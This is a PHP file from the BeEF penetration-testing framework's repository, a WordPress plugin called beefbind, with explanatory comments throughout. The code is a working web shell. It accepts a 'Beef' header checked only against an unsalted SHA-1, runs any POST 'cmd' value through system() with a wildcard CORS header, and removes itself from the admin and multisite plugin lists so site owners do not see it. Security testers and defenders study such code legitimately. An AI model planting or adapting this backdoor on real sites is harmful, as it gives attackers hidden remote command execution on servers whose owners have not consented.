beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/misc/wordpress/upload_rce_plugin/beefbind.php
<?php
/**
* Plugin Name: beefbind
* Plugin URI: https://beefproject.com
* Description: BeEF bind shell with CORS.
* Version: 1.1
* Authors: Bart Leppens, Erwan LR (@erwan_lr | WPScanTeam)
* Author URI: https://twitter.com/bmantra
* License: Copyright (c) 2006-2025 Wade Alcorn - [email protected] - Browser Exploitation Framework (BeEF) - https://beefproject.com - See the file 'doc/COPYING' for copying permission
**/
// Sent on every request that reaches this file: the wildcard lets a page on
// any origin read the response cross-site.
header("Access-Control-Allow-Origin: *");

// '#SHA1HASH#' is a template placeholder, not a digest: sha1() returns 40 hex
// characters, so the comparison below can never match until this value is
// replaced. Presumably substituted when the plugin archive is generated.
define('SHA1_HASH', '#SHA1HASH#');
// "directory/file" identifier of this plugin; used further down in the file as
// the key to look up in WordPress's plugin lists.
define('BEEF_PLUGIN', 'beefbind/beefbind.php');

// Command gate. It sits outside the WPINC check below, so it runs whenever the
// file executes, including when the file is requested directly rather than
// loaded by WordPress. $_SERVER['HTTP_BEEF'] is PHP's view of a request header
// named "Beef".
// NOTE(review): for detection, a request carrying a "Beef" header together with
// a POST field "cmd" is the visible signature of this code path.
if (isset($_SERVER['HTTP_BEEF']) && strlen($_SERVER['HTTP_BEEF']) > 1) {
    // The only access control is an unsalted SHA-1 of the header value compared
    // to the embedded constant; no WordPress login, nonce or capability check
    // is involved.
    if (strcasecmp(sha1($_SERVER['HTTP_BEEF']), SHA1_HASH) === 0) {
        if (isset($_POST['cmd']) && strlen($_POST['cmd']) > 0) {
            // The request-supplied string is passed unmodified to the OS shell
            // and runs with the privileges of the PHP process. system() writes
            // the command output to the response itself and returns the last
            // output line, which this echo prints a second time.
            echo system($_POST['cmd']);
        }
    }
}
// WPINC is a constant set by WordPress core, so this part only runs when
// WordPress has loaded the file as a plugin; a direct request to the file
// skips it. Both hooks below only edit in-memory lists. The plugin file itself
// is untouched, so a directory listing or file-integrity check of the plugins
// directory is not affected by them.
if (defined('WPINC')) {
    /**
     * Drops this plugin's entry from the admin plugin list table.
     *
     * Registered on the 'pre_current_active_plugins' action. Reads the global
     * $wp_list_table and unsets the item keyed by BEEF_PLUGIN, so the row is
     * gone from the table's item list after the hook has run.
     */
    function hide_plugin() {
        global $wp_list_table;

        foreach ($wp_list_table->items as $key => $val) {
            // Loose (==) comparison of the item key against the plugin identifier.
            if ($key == BEEF_PLUGIN) { unset($wp_list_table->items[$key]); }
        }
    }
    add_action('pre_current_active_plugins', 'hide_plugin');

    // Per the original author's comment, this second hook covers multisite
    // installations: it filters the plugin array passed through 'all_plugins'.
    /**
     * Removes this plugin from the array handed to the 'all_plugins' filter.
     *
     * @param array $plugins Plugin list keyed by "directory/file" identifier.
     * @return array The same list without the BEEF_PLUGIN entry.
     */
    function hide_plugin_from_network($plugins) {
        if (in_array(BEEF_PLUGIN, array_keys($plugins))) { unset($plugins[BEEF_PLUGIN]); }

        return $plugins;
    }
    add_filter('all_plugins', 'hide_plugin_from_network');
}
?>